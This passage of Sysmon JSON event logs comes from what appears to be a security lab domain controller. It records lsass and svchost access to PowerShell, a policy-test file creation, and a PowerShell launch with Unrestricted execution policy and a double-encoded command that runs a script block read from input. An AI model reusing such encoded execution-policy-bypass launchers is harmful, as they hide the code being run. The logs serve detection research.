C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:35.796","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-0323-5F25-0000-00109D990700}","TargetProcessId":"3260","TargetImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:36","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:35","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":4826,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:35.812\r\nProcessGuid: {A837DB8D-0323-5F25-0000-00109D990700}\r\nProcessId: 3260\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetFilename: C:\\Users\\Administrator\\AppData\\Local\\Temp\\__PSScriptPolicyTest_nupwapkq.lgj.ps1\r\nCreationUtcTime: 2020-08-01 05:52:35.812","Category":"File created (rule: FileCreate)","Opcode":"Info","UtcTime":"2020-08-01 05:52:35.812","ProcessGuid":"{A837DB8D-0323-5F25-0000-00109D990700}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetFilename":"C:\\Users\\Administrator\\AppData\\Local\\Temp\\__PSScriptPolicyTest_nupwapkq.lgj.ps1","CreationUtcTime":"2020-08-01 05:52:35.812","EventReceivedTime":"2020-08-01 05:52:36","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:35","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4827,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:35.843\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-001001540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 2800\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {A837DB8D-0323-5F25-0000-00109D990700}\r\nTargetProcessId: 3260\r\nTargetImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\System32\\RPCRT4.dll+1129f|C:\\Windows\\system32\\lsasrv.dll+25add|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:35.843","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-001001540000}","SourceProcessId":"864","SourceThreadId":"2800","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{A837DB8D-0323-5F25-0000-00109D990700}","TargetProcessId":"3260","TargetImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\System32\\RPCRT4.dll+1129f|C:\\Windows\\system32\\lsasrv.dll+25add|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:36","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:35","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4828,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:35.843\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-001001540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 2800\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {A837DB8D-0323-5F25-0000-00109D990700}\r\nTargetProcessId: 3260\r\nTargetImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nGrantedAccess: 0x1478\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+25d17|C:\\Windows\\system32\\lsasrv.dll+26ded|C:\\Windows\\system32\\lsasrv.dll+25b95|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:35.843","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-001001540000}","SourceProcessId":"864","SourceThreadId":"2800","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{A837DB8D-0323-5F25-0000-00109D990700}","TargetProcessId":"3260","TargetImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","GrantedAccess":"0x1478","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+25d17|C:\\Windows\\system32\\lsasrv.dll+26ded|C:\\Windows\\system32\\lsasrv.dll+25b95|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:36","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:35","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":4829,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:35.910\r\nProcessGuid: {A837DB8D-0323-5F25-0000-001016A60700}\r\nProcessId: 3396\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nFileVersion: 10.0.14393.206 (rs1_release.160915-0644)\r\nDescription: Windows PowerShell\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: PowerShell.EXE\r\nCommandLine: \"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand JgBjAGgAYwBwAC4AYwBvAG0AIAA2ADUAMAAwADEAIAA+ACAAJABuAHUAbABsAAoAJABlAHgAZQBjAF8AdwByAGEAcABwAGUAcgBfAHMAdAByACAAPQAgACQAaQBuAHAAdQB0ACAAfAAgAE8AdQB0AC0AUwB0AHIAaQBuAGcACgAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAgAD0AIAAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAF8AcwB0AHIALgBTAHAAbABpAHQAKABAACgAIgBgADAAYAAwAGAAMABgADAAIgApACwAIAAyACwAIABbAFMAdAByAGkAbgBnAFMAcABsAGkAdABPAHAAdABpAG8AbgBzAF0AOgA6AFIAZQBtAG8AdgBlAEUAbQBwAHQAeQBFAG4AdAByAGkAZQBzACkACgBJAGYAIAAoAC0AbgBvAHQAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAuAEwAZQBuAGcAdABoACAALQBlAHEAIAAyACkAIAB7ACAAdABoAHIAbwB3ACAAIgBpAG4AdgBhAGwAaQBkACAAcABhAHkAbABvAGEAZAAiACAAfQAKAFMAZQB0AC0AVgBhAHIAaQBhAGIAbABlACAALQBOAGEAbQBlACAAagBzAG8AbgBfAHIAYQB3ACAALQBWAGEAbAB1AGUAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADEAXQAKACQAZQB4AGUAYwBfAHcAcgBhAHAAcABlAHIAIAA9ACAAWwBTAGMAcgBpAHAAdABCAGwAbwBjAGsAXQA6ADoAQwByAGUAYQB0AGUAKAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADAAXQApAAoAJgAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAA==\r\nCurrentDirectory: C:\\Users\\Administrator\\\r\nUser: ATTACKRANGE\\Administrator\r\nLogonGuid: {A837DB8D-0323-5F25-0000-0020A2950700}\r\nLogonId: 0x795A2\r\nTerminalSessionId: 0\r\nIntegrityLevel: High\r\nHashes: MD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453\r\nParentProcessGuid: {A837DB8D-0323-5F25-0000-00109D990700}\r\nParentProcessId: 3260\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: PowerShell  -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand UABvAHcAZQByAFMAaABlAGwAbAAgAC0ATgBvAFAAcgBvAGYAaQBsAGUAIAAtAE4AbwBuAEkAbgB0AGUAcgBhAGMAdABpAHYAZQAgAC0ARQB4AGUAYwB1AHQAaQBvAG4AUABvAGwAaQBjAHkAIABVAG4AcgBlAHMAdAByAGkAYwB0AGUAZAAgAC0ARQBuAGMAbwBkAGUAZABDAG8AbQBtAGEAbgBkACAASgBnAEIAagBBAEcAZwBBAFkAdwBCAHcAQQBDADQAQQBZAHcAQgB2AEEARwAwAEEASQBBAEEAMgBBAEQAVQBBAE0AQQBBAHcAQQBEAEUAQQBJAEEAQQArAEEAQwBBAEEASgBBAEIAdQBBAEgAVQBBAGIAQQBCAHMAQQBBAG8AQQBKAEEAQgBsAEEASABnAEEAWgBRAEIAagBBAEYAOABBAGQAdwBCAHkAQQBHAEUAQQBjAEEAQgB3AEEARwBVAEEAYwBnAEIAZgBBAEgATQBBAGQAQQBCAHkAQQBDAEEAQQBQAFEAQQBnAEEAQwBRAEEAYQBRAEIAdQBBAEgAQQBBAGQAUQBCADAAQQBDAEEAQQBmAEEAQQBnAEEARQA4AEEAZABRAEIAMABBAEMAMABBAFUAdwBCADAAQQBIAEkAQQBhAFEAQgB1AEEARwBjAEEAQwBnAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBBAGcAQQBEADAAQQBJAEEAQQBrAEEARwBVAEEAZQBBAEIAbABBAEcATQBBAFgAdwBCADMAQQBIAEkAQQBZAFEAQgB3AEEASABBAEEAWgBRAEIAeQBBAEYAOABBAGMAdwBCADAAQQBIAEkAQQBMAGcAQgBUAEEASABBAEEAYgBBAEIAcABBAEgAUQBBAEsAQQBCAEEAQQBDAGcAQQBJAGcAQgBnAEEARABBAEEAWQBBAEEAdwBBAEcAQQBBAE0AQQBCAGcAQQBEAEEAQQBJAGcAQQBwAEEAQwB3AEEASQBBAEEAeQBBAEMAdwBBAEkAQQBCAGIAQQBGAE0AQQBkAEEAQgB5AEEARwBrAEEAYgBnAEIAbgBBAEYATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBQAEEASABBAEEAZABBAEIAcABBAEcAOABBAGIAZwBCAHoAQQBGADAAQQBPAGcAQQA2AEEARgBJAEEAWgBRAEIAdABBAEcAOABBAGQAZwBCAGwAQQBFAFUAQQBiAFEAQgB3AEEASABRAEEAZQBRAEIARgBBAEcANABBAGQAQQBCAHkAQQBHAGsAQQBaAFEAQgB6AEEAQwBrAEEAQwBnAEIASgBBAEcAWQBBAEkAQQBBAG8AQQBDADAAQQBiAGcAQgB2AEEASABRAEEASQBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBBAHUAQQBFAHcAQQBaAFEAQgB1AEEARwBjAEEAZABBAEIAbwBBAEMAQQBBAEwAUQBCAGwAQQBIAEUAQQBJAEEAQQB5AEEAQwBrAEEASQBBAEIANwBBAEMAQQBBAGQAQQBCAG8AQQBIAEkAQQBiAHcAQgAzAEEAQwBBAEEASQBnAEIAcABBAEcANABBAGQAZwBCAGgAQQBHAHcAQQBhAFEAQgBrAEEAQwBBAEEAYwBBAEIAaABBAEgAawBBAGIAQQBCAHYAQQBHAEUAQQBaAEEAQQBpAEEAQwBBAEEAZgBRAEEASwBBAEYATQBBAFoAUQBCADAAQQBDADAAQQBWAGcAQgBoAEEASABJAEEAYQBRAEIAaABBAEcASQBBAGIAQQBCAGwAQQBDAEEAQQBMAFEAQgBPAEEARwBFAEEAYgBRAEIAbABBAEMAQQBBAGEAZwBCAHoAQQBHADgAQQBiAGcAQgBmAEEASABJAEEAWQBRAEIAMwBBAEMAQQBBAEwAUQBCAFcAQQBHAEUAQQBiAEEAQgAxAEEARwBVAEEASQBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBCAGIAQQBEAEUAQQBYAFEAQQBLAEEAQwBRAEEAWgBRAEIANABBAEcAVQBBAFkAdwBCAGYAQQBIAGMAQQBjAGcAQgBoAEEASABBAEEAYwBBAEIAbABBAEgASQBBAEkAQQBBADkAQQBDAEEAQQBXAHcAQgBUAEEARwBNAEEAYwBnAEIAcABBAEgAQQBBAGQAQQBCAEMAQQBHAHcAQQBiAHcAQgBqAEEARwBzAEEAWABRAEEANgBBAEQAbwBBAFEAdwBCAHkAQQBHAFUAQQBZAFEAQgAwAEEARwBVAEEASwBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBCAGIAQQBEAEEAQQBYAFEAQQBwAEEAQQBvAEEASgBnAEEAawBBAEcAVQBBAGUAQQBCAGwAQQBHAE0AQQBYAHcAQgAzAEEASABJAEEAWQBRAEIAdwBBAEgAQQBBAFoAUQBCAHkAQQBBAD0APQA=","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 05:52:35.910","ProcessGuid":"{A837DB8D-0323-5F25-0000-001016A60700}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","FileVersion":"10.0.14393.206 (rs1_release.160915-0644)","Description":"Windows PowerShell","Product":"Microsoft® Windows® Operating System","Company":"Microsoft Corporation","OriginalFileName":"PowerShell.EXE","CommandLine":"\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand JgBjAGgAYwBwAC4AYwBvAG0AIAA2ADUAMAAwADEAIAA+ACAAJABuAHUAbABsAAoAJABlAHgAZQBjAF8AdwByAGEAcABwAGUAcgBfAHMAdAByACAAPQAgACQAaQBuAHAAdQB0ACAAfAAgAE8AdQB0AC0AUwB0AHIAaQBuAGcACgAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAgAD0AIAAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAF8AcwB0AHIALgBTAHAAbABpAHQAKABAACgAIgBgADAAYAAwAGAAMABgADAAIgApACwAIAAyACwAIABbAFMAdAByAGkAbgBnAFMAcABsAGkAdABPAHAAdABpAG8AbgBzAF0AOgA6AFIAZQBtAG8AdgBlAEUAbQBwAHQAeQBFAG4AdAByAGkAZQBzACkACgBJAGYAIAAoAC0AbgBvAHQAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAuAEwAZQBuAGcAdABoACAALQBlAHEAIAAyACkAIAB7ACAAdABoAHIAbwB3ACAAIgBpAG4AdgBhAGwAaQBkACAAcABhAHkAbABvAGEAZAAiACAAfQAKAFMAZQB0AC0AVgBhAHIAaQBhAGIAbABlACAALQBOAGEAbQBlACAAagBzAG8AbgBfAHIAYQB3ACAALQBWAGEAbAB1AGUAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADEAXQAKACQAZQB4AGUAYwBfAHcAcgBhAHAAcABlAHIAIAA9ACAAWwBTAGMAcgBpAHAAdABCAGwAbwBjAGsAXQA6ADoAQwByAGUAYQB0AGUAKAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADAAXQApAAoAJgAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAA==","CurrentDirectory":"C:\\Users\\Administrator\\","User":"ATTACKRANGE\\Administrator","LogonGuid":"{A837DB8D-0323-5F25-0000-0020A2950700}","LogonId":"0x795a2","TerminalSessionId":"0","IntegrityLevel":"High","Hashes":"MD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453","ParentProcessGuid":"{A837DB8D-0323-5F25-0000-00109D990700}","ParentProcessId":"3260","ParentImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","ParentCommandLine":"PowerShell  -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand UABvAHcAZQByAFMAaABlAGwAbAAgAC0ATgBvAFAAcgBvAGYAaQBsAGUAIAAtAE4AbwBuAEkAbgB0AGUAcgBhAGMAdABpAHYAZQAgAC0ARQB4AGUAYwB1AHQAaQBvAG4AUABvAGwAaQBjAHkAIABVAG4AcgBlAHMAdAByAGkAYwB0AGUAZAAgAC0ARQBuAGMAbwBkAGUAZABDAG8AbQBtAGEAbgBkACAASgBnAEIAagBBAEcAZwBBAFkAdwBCAHcAQQBDADQAQQBZAHcAQgB2AEEARwAwAEEASQBBAEEAMgBBAEQAVQBBAE0AQQBBAHcAQQBEAEUAQQBJAEEAQQArAEEAQwBBAEEASgBBAEIAdQBBAEgAVQBBAGIAQQBCAHMAQQBBAG8AQQBKAEEAQgBsAEEASABnAEEAWgBRAEIAagBBAEYAOABBAGQAdwBCAHkAQQBHAEUAQQBjAEEAQgB3AEEARwBVAEEAYwBnAEIAZgBBAEgATQBBAGQAQQBCAHkAQQBDAEEAQQBQAFEAQQBnAEEAQwBRAEEAYQBRAEIAdQBBAEgAQQBBAGQAUQBCADAAQQBDAEEAQQBmAEEAQQBnAEEARQA4AEEAZABRAEIAMABBAEMAMABBAFUAdwBCADAAQQBIAEkAQQBhAFEAQgB1AEEARwBjAEEAQwBnAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBBAGcAQQBEADAAQQBJAEEAQQBrAEEARwBVAEEAZQBBAEIAbABBAEcATQBBAFgAdwBCADMAQQBIAEkAQQBZAFEAQgB3AEEASABBAEEAWgBRAEIAeQBBAEYAOABBAGMAdwBCADAAQQBIAEkAQQBMAGcAQgBUAEEASABBAEEAYgBBAEIAcABBAEgAUQBBAEsAQQBCAEEAQQBDAGcAQQBJAGcAQgBnAEEARABBAEEAWQBBAEEAdwBBAEcAQQBBAE0AQQBCAGcAQQBEAEEAQQBJAGcAQQBwAEEAQwB3AEEASQBBAEEAeQBBAEMAdwBBAEkAQQBCAGIAQQBGAE0AQQBkAEEAQgB5AEEARwBrAEEAYgBnAEIAbgBBAEYATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBQAEEASABBAEEAZABBAEIAcABBAEcAOABBAGIAZwBCAHoAQQBGADAAQQBPAGcAQQA2AEEARgBJAEEAWgBRAEIAdABBAEcAOABBAGQAZwBCAGwAQQBFAFUAQQBiAFEAQgB3AEEASABRAEEAZQBRAEIARgBBAEcANABBAGQAQQBCAHkAQQBHAGsAQQBaAFEAQgB6AEEAQwBrAEEAQwBnAEIASgBBAEcAWQBBAEkAQQBBAG8AQQBDADAAQQBiAGcAQgB2AEEASABRAEEASQBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBBAHUAQQBFAHcAQQBaAFEAQgB1AEEARwBjAEEAZABBAEIAbwBBAEMAQQBBAEwAUQBCAGwAQQBIAEUAQQBJAEEAQQB5AEEAQwBrAEEASQBBAEIANwBBAEMAQQBBAGQAQQBCAG8AQQBIAEkAQQBiAHcAQgAzAEEAQwBBAEEASQBnAEIAcABBAEcANABBAGQAZwBCAGgAQQBHAHcAQQBhAFEAQgBrAEEAQwBBAEEAYwBBAEIAaABBAEgAawBBAGIAQQBCAHYAQQBHAEUAQQBaAEEAQQBpAEEAQwBBAEEAZgBRAEEASwBBAEYATQBBAFoAUQBCADAAQQBDADAAQQBWAGcAQgBoAEEASABJAEEAYQBRAEIAaABBAEcASQBBAGIAQQBCAGwAQQBDAEEAQQBMAFEAQgBPAEEARwBFAEEAYgBRAEIAbABBAEMAQQBBAGEAZwBCAHoAQQBHADgAQQBiAGcAQgBmAEEASABJAEEAWQBRAEIAMwBBAEMAQQBBAEwAUQBCAFcAQQBHAEUAQQBiAEEAQgAxAEEARwBVAEEASQBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBCAGIAQQBEAEUAQQBYAFEAQQBLAEEAQwBRAEEAWgBRAEIANABBAEcAVQBBAFkAdwBCAGYAQQBIAGMAQQBjAGcAQgBoAEEASABBAEEAYwBBAEIAbABBAEgASQBBAEkAQQBBADkAQQBDAEEAQQBXAHcAQgBUAEEARwBNAEEAYwBnAEIAcABBAEgAQQBBAGQAQQBCAEMAQQBHAHcAQQBiAHcAQgBqAEEARwBzAEEAWABRAEEANgBBAEQAbwBBAFEAdwBCAHkAQQBHAFUAQQBZAFEAQgAwAEEARwBVAEEASwBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBCAGIAQQBEAEEAQQBYAFEAQQBwAEEAQQBvAEEASgBnAEEAawBBAEcAVQBBAGUAQQBCAGwAQQBHAE0AQQBYAHcAQgAzAEEASABJAEEAWQBRAEIAdwBBAEgAQQBBAFoAUQBCAHkAQQBBAD0APQA=","EventReceivedTime":"2020-08-01 05:52:36","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:35","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4830,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:35.906\r\nSourceProcessGUID: {A837DB8D-0323-5F25-0000-00109D990700}\r\nSourceProcessId: 3260\r\nSourceThreadId: 4256\r\nSourceImage: 